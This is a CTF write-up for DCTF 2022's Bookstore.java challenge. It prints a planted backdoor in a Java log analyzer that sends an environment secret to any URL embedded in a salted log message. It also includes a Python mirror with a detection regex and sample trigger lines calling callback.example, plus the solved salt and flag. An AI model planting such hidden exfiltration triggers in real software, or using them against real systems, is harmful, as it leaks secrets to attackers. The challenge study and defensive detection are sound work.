I took part in the DCTF 2022 with the team Ulisse from the University of Bologna.
The Bookstore.java challenge stated that:
Web developer left the company because he was not being paid. He left some hidden features for him, to bypass security. Can you find the vulnerability? http://book-store.dragonsec.si
And gave us a book_store.jar file.
The Log4Book
If we open the jar file with a decompiler (like JD-GUI) we can see that there is a vulnerability in the log analyzer.
```java
// Matches get{...}salt=<SALT>, with SALT read from the environment
Pattern pattern2 = Pattern.compile("get\\{.*\\}salt=" + System.getenv("SALT"));
Matcher matcher2 = pattern2.matcher(mssg);
String substring2 = null;
if (matcher2.find()) {
    substring2 = matcher2.group();
}
if (substring2 != null) {
    // 123 is '{' and 125 is '}': the URL between the first pair of braces is fetched
    downloadFile(substring2.substring(substring2.indexOf(123) + 1, substring2.indexOf(125)));
}
```
If the log string contains the template `get{...}salt=` followed by the value of the environment variable SALT, the program sends an HTTP GET request to the URL between `{...}`, with a `Not-Found` header whose value is the environment variable NOT_FOUND (which I suppose is the flag).
```java
URL link = new URL(url);
link.toURI();
HttpURLConnection conn = (HttpURLConnection) link.openConnection();
conn.setRequestMethod("GET");
// The NOT_FOUND environment variable is sent out in a request header
conn.setRequestProperty("not-found", System.getenv("NOT_FOUND"));
```
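To see exactly what the hidden feature reacts to, and to give a defender something to grep logs with, here is an added Python re-implementation of the trigger logic (it is not the challenge's Java, just a mirror of it). It also shows an edge case of the decompiled code: the regex's `.*` is greedy, but the URL is cut at the first `}`, so a message like `get{a}b}salt=...` still matches yet only `a` is fetched. The salt, the log lines and the callback host are constructed sample values.

```python
import re
from collections import namedtuple
from typing import List, Optional

# Constructed sample salt for the demo (the real one comes from the SALT env var).
DEMO_SALT = "oeeeeooo"


def extract_trigger_url(mssg: str, salt: str) -> Optional[str]:
    """Mirror of the Java logic: match get{...}salt=<SALT> in a log message and
    return the text between the first '{' and the first '}' of the match
    (indexOf(123) / indexOf(125)).  None when the message does not trigger.
    Note: the Java code concatenates SALT unescaped; we escape it, which only
    matters if the salt contained regex metacharacters."""
    pattern = re.compile(r"get\{.*\}salt=" + re.escape(salt))
    m = pattern.search(mssg)
    if m is None:
        return None
    found = m.group()
    return found[found.index("{") + 1 : found.index("}")]


# Detection side: a defender does not know the salt, so alert on the template
# itself.  [^}]* is used instead of .* so one hit per message is reported.
PROBE_TEMPLATE = re.compile(r"get\{[^}]*\}salt=")

Probe = namedtuple("Probe", "line_no fragment")


def find_probes(log_lines: List[str]) -> List[Probe]:
    """Return every log line carrying the hidden-feature template, whether or
    not the appended salt is right: guessing attempts are worth seeing too."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = PROBE_TEMPLATE.search(line)
        if m:
            hits.append(Probe(n, m.group()))
    return hits


# Constructed sample log lines (not real application output).
SAMPLE_LOG = [
    "INFO  search term='Macbeth'",
    "WARN  search term='get{http://callback.example/cb}salt=wrongsalt'",
    "INFO  search term='get{http://callback.example/cb}salt=oeeeeooo'",
    "INFO  review text='I liked the {third} act'",
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(repr(extract_trigger_url(line, DEMO_SALT)))
    print(find_probes(SAMPLE_LOG))
```

Only the third sample line would make the analyzer call out, but `find_probes` reports the second one as well, which is the line a defender actually wants to know about: someone is feeding the trigger template into a field that ends up in the logs.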
Finding the SALT environment value
We're given a hint:
Method how the salt is generated is given through variable names in one java class. The salt is 8 chars long.
If we look at the class Art, we can see that there are two strange variable names:
```java
String frequency = fontType.getValue();
int analysis_should_be_fun = findImageWidth(textHeight, artText, frequency);
```
which, read together, spell out: frequency analysis should be fun
Analyzing the frequency
Inside the jar we find a book.json file, which has 8 paragraphs of a Shakespearean play.
After searching without result for studies on the frequency analysis of Shakespeare's plays, we remembered that the hint says the salt is 8 characters long, and that there are exactly 8 paragraphs both on the page presented by the website and in the file book.json.
If we join the most frequent letter of each paragraph, we get the salt, and we can then make the program ping our URL (ngrok) with the flag.
Salt: `oeeeeooo`
Flag: `dctf{L0g_4_hid3n_d@7@_n0t_s0_h@rd_righ7}`